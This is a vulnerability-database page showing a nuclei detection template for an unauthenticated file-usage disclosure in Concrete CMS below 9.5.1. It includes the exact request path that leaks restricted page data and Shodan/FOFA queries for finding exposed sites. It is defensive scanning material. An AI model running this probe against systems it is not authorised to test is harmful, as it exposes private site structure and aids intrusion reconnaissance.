Lucene search
+L

Concrete CMS <9.5.1 - Unauthenticated File Usage Disclosure

🗓️ 03 Sep 2026 02:10:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 9 Views

Concrete CMS 9.5.0 and below allows unauthenticated IDOR to disclose file usage data via missing permission check.

Related
Code
id: CVE-2026-6826

info:
  name: Concrete CMS <9.5.1 - Unauthenticated File Usage Disclosure
  author: str4k3r
  severity: medium
  description: |
    Concrete CMS 9.5.0 and below  is vulnerable to unauthenticated file usage disclosure via missing permission check in the usage controller.
  impact: |
    Any unauthenticated visitor can request /ccm/system/dialogs/file/usage/{fID} with any file ID and receive a list of every page that references that file, including page IDs, handles, and full URLs. This includes pages that are otherwise restricted by permissions.
  remediation: |
    Update to the latest version beyond 9.5.0.
  reference:
    - https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes
    - https://www.concretecms.org/security
    - https://nvd.nist.gov/vuln/detail/CVE-2026-6826
    - https://vulnerability.circl.lu/vuln/cve-2026-6826
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N
    cvss-score: 6.9
    cve-id: CVE-2026-6826
    epss-score: 0.01461
    epss-percentile: 0.71784
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.component:"Concrete CMS"
    fofa-query: app="Concrete-CMS"
  tags: cve,cve2026,concretecms,concrete,disclosure,unauth,idor

http:
  - method: GET
    path:
      - "{{BaseURL}}/ccm/system/dialogs/file/usage/1"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'ccm-ui'
          - 'Page ID'
          - 'Handle'
          - 'Location'
        condition: and

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ce82f865320e495a767f963f33a3f3b0cffff1cdda3dc07d8db480de50d05680022100983a7f9a87bb95e74e645e46ad8417bcc6ffb98545837bcbdb2e14a8109e01fe:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 Aug 2026 21:11Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.15.3
CVSS 46.9
EPSS0.01461
SSVC
9